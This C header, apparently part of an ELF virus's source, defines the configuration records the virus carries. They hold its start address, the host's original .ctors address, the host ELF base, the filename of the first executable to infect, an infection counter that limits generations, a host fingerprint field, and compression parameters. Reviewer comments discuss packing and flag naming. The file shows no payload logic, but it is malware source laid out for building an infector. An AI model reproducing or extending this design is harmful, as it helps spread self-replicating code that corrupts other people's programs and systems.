
#ifndef	WRCONFIG_H
#define	WRCONFIG_H

/* pack(1) applies to every declaration that follows, so both records
 * below are laid out without padding between their fields.
 * NOTE(review): no matching restore ("#pragma pack()" or push/pop) is
 * visible in this header, so the setting also carries into whatever the
 * including file declares afterwards - confirm that this is intended.
 */
#pragma pack(1)

/* size in bytes of the vinit.victim filename buffer in wrconfig */
#define	VICTIM_LEN	32


/* wrdynconfig
 *
 * dynamic configuration record. only active after the first infection
 * has taken place.
 *
 * it is the `vcfg` member of the `dyn` union in wrconfig, so it occupies
 * the same bytes as the first-infection `vinit` data (filename plus
 * pointer) declared there.
 *
 * layout: the header sets #pragma pack(1) before this declaration, so
 * the fields are adjacent with no padding. assuming a 4-byte unsigned
 * int that gives 1 + 4 + 4 + 4 + 8 = 21 bytes - confirm for the target.
 */

typedef struct {
	/* first byte of the record; it shares its offset with
	 * vinit.victim[0] in the wrconfig union.
	 * NOTE(review): presumably a zero here is how the code tells this
	 * record from a filename - confirm in wrcore.c.
	 */
	unsigned char	cnul;	/* constant 0x00 */
	unsigned int	flags;	/* various flags, see below */

	/* flag dependent fields: each one is only meaningful when the flag
	 * named in parentheses is set in `flags`.
	 */
	unsigned int	icount;	/* (WRF_GENERATION_LIMIT) infection count */
	/* NOTE(review): the flag named here is WRF_KEEP_FINGERPRINT, but
	 * the fingerprint flag this header defines is WRF_GET_FINGERPRINT -
	 * confirm which name is intended.
	 */
	unsigned int	curhost;	/* (WRF_KEEP_FINGERPRINT) this host */

	unsigned char	xxx_temp[8];	/* FIXME: temporary filename for testing */
} wrdynconfig;

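/* flag access macros
 *
 * every macro expands to one parenthesised expression without a trailing
 * semicolon; the call site supplies its own ";". with the semicolon
 * inside the macro, "if (c) WRF_SET(f, m); else ..." expanded to two
 * statements and the else lost its if.
 *
 * WRF_ISSET  - true only when every bit of flagmask is set in flags.
 *              flagmask is evaluated twice, so pass an expression
 *              without side effects.
 * WRF_SET    - set the flagmask bits in flags (flags must be an lvalue)
 * WRF_CLEAR  - clear the flagmask bits in flags (flags must be an lvalue)
 * WRF_TOGGLE - invert the flagmask bits in flags (flags must be an lvalue)
 */
#define	WRF_ISSET(flags,flagmask) \
	(((flags) & (flagmask)) == (flagmask))
#define	WRF_SET(flags,flagmask) \
	((flags) |= (flagmask))
#define	WRF_CLEAR(flags,flagmask) \
	((flags) &= ~(flagmask))
#define	WRF_TOGGLE(flags,flagmask) \
	((flags) ^= (flagmask))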

/* bit masks for wrdynconfig.flags; test and modify them with the WRF_*
 * access macros.
 */

/* limit propagation by icount, icount is decreased until it reaches 0 */
#define	WRF_GENERATION_LIMIT	0x00000001
/* always keep a fingerprint of the current host in curhost */
#define	WRF_GET_FINGERPRINT	0x00000002


/* wrconfig
 *
 * static configuration record: addresses, the dual-purpose `dyn` union
 * and the compression parameters.
 *
 * layout: the header sets #pragma pack(1) before this declaration, so
 * the fields are adjacent with no padding. the widths of
 * `unsigned long int` and `void *` depend on the target ABI, so the byte
 * offsets are not fixed by this header alone.
 */
typedef struct {
	unsigned long int	wr_start;	/* virtual start address */
	/* NOTE(review): undocumented here; presumably the decompressed
	 * length - confirm against the code that reads it.
	 */
	unsigned long int	decomp_len;
	unsigned long int	wr_oldctors;	/* original .ctors address */

	unsigned long int	elf_base;	/* &elf_header[0] of host */

	union {
		/* upon first infection the victim array is used to carry the
		 * name of the executable to be infected.
		 * afterwards (i.e. any other infection) this space is
		 * recycled for data specifying various properties of the
		 * virus. see wrcore.c for a more in-depth explanation.
		 *
		 * first infection (set by the "initial" program):
		 *    victim = filename to be infected
		 *    vcfgptr = pointer to memory which will overwrite the
		 *        vcfg structure.
		 *
		 * both members start at the same offset, so vcfg.cnul shares
		 * its byte with victim[0].
		 */
		struct {
			unsigned char	victim[VICTIM_LEN];
			void *		vcfgptr;
		} vinit;

		wrdynconfig	vcfg;
	} dyn;

	/* compression related data
	 *
	 * NOTE(review): the meaning of the individual fields is not
	 * documented in this header. cmprlen is presumably the compressed
	 * length - confirm against the compression code.
	 */
	unsigned long int	cmprlen;
	unsigned char		llstuff;
	unsigned short int	hl1stuff;
	unsigned char		hl2stuff;
	unsigned char		hf2stuff;
} wrconfig;

#endif